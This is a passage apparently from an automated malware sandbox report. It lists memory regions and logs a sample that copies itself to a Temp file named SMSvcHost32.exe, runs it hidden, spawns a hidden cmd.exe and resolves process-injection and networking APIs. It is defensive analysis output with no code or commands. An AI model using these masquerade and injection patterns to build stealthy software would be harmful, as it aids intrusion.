| pagefile_0x00000000008e0000 | 0x008e0000 | 0x00a67fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00bf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x01ffffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x02032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0207ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x0217ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x02197fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002180000 | 0x02180000 | 0x02180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002190000 | 0x02190000 | 0x02190fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x021a0000 | 0x021a3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000021b0000 | 0x021b0000 | 0x021bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x021c0000 | 0x024f6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x0253ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db | 0x02780000 | 0x027c4fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x027d0000 | 0x027d3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x027e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027f0000 | 0x027f0000 | 0x027f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db | 0x02810000 | 0x02823fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02840fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x02960000 | 0x029edfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000029f0000 | 0x029f0000 | 0x02deafff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002df0000 | 0x02df0000 | 0x02e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x02f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f70000 | 0x02f70000 | 0x0306ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x030affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x031affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031b0000 | 0x031b0000 | 0x031effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x032effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x0332ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003330000 | 0x03330000 | 0x0342ffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6f830000 | 0x6fa3efff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x6fa40000 | 0x6fa55fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6fa60000 | 0x6faf1fff | Memory Mapped File | rwx |
|
|
|
- |
| adsldpc.dll | 0x6fb00000 | 0x6fb37fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x6fb40000 | 0x6fbd8fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x6fbe0000 | 0x6fbe7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsuiext.dll | 0x6fbf0000 | 0x6fc98fff | Memory Mapped File | rwx |
|
|
|
- |
| activeds.dll | 0x6fca0000 | 0x6fcdafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6fce0000 | 0x6fcfbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x6fd00000 | 0x6fd17fff | Memory Mapped File | rwx |
|
|
|
- |
| odbctrac.dll | 0x6fd20000 | 0x6fd45fff | Memory Mapped File | rwx |
|
|
|
- |
| dsprop.dll | 0x6fd50000 | 0x6fd76fff | Memory Mapped File | rwx |
|
|
|
- |
| edputil.dll | 0x6fe90000 | 0x6fed8fff | Memory Mapped File | rwx |
|
|
|
- |
| efswrt.dll | 0x6fee0000 | 0x6ff50fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| pcacli.dll | 0x70010000 | 0x7001bfff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x70190000 | 0x701b7fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x70b10000 | 0x70b84fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x72190000 | 0x721befff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x72620000 | 0x7276afff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x74260000 | 0x74327fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x745e0000 | 0x74671fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76680000 | 0x766d2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Copy | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | source_filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp |
|
1 | |
| Delete | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | - |
|
1 |
Process (9)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | os_pid = 0x934, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | show_window = SW_HIDE |
|
1 | |
| Get filename | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | file_name = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, flags = PROCESS_NAME_WIN32 |
|
1 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION, SYNCHRONIZE |
|
1 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_TERMINATE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_TERMINATE, PROCESS_QUERY_INFORMATION |
|
2 | |
| Terminate | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | exit_code = 0 |
|
1 | |
| Terminate | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | exit_code = 0 |
|
1 |
Module (250)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | WININET.dll | base_address = 0x702b0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x772c0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x701e0000 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x70210000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x77490000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x6ff60000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75120000 |
|
1 | |
| Get Handle | c:\windows\syswow64\eappcfg.dll | base_address = 0x6ffa0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x765a0000 |
|
4 | |
| Get Handle | WININET.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x74b20000 |
|
1 | |
| Get Handle | PSAPI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000 |
|
1 | |
| Get Handle | USERENV.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ws2_32.dll | base_address = 0x746c0000 |
|
1 | |
| Get Handle | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Get Handle | NETAPI32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77810000 |
|
1 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | Secur32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x75120000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x771d0000 |
|
1 | |
| Get Handle | c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp | base_address = 0x400000 |
|
2 | |
| Get Filename | Secur32.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77992bd0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x765b1ba0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x765c5eb0 |
|
2 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 52, address_out = 0x746f1110 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 2, address_out = 0x746d3230 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 3, address_out = 0x746cead0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 11, address_out = 0x746c5240 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 15, address_out = 0x746c4a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 115, address_out = 0x746c6520 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
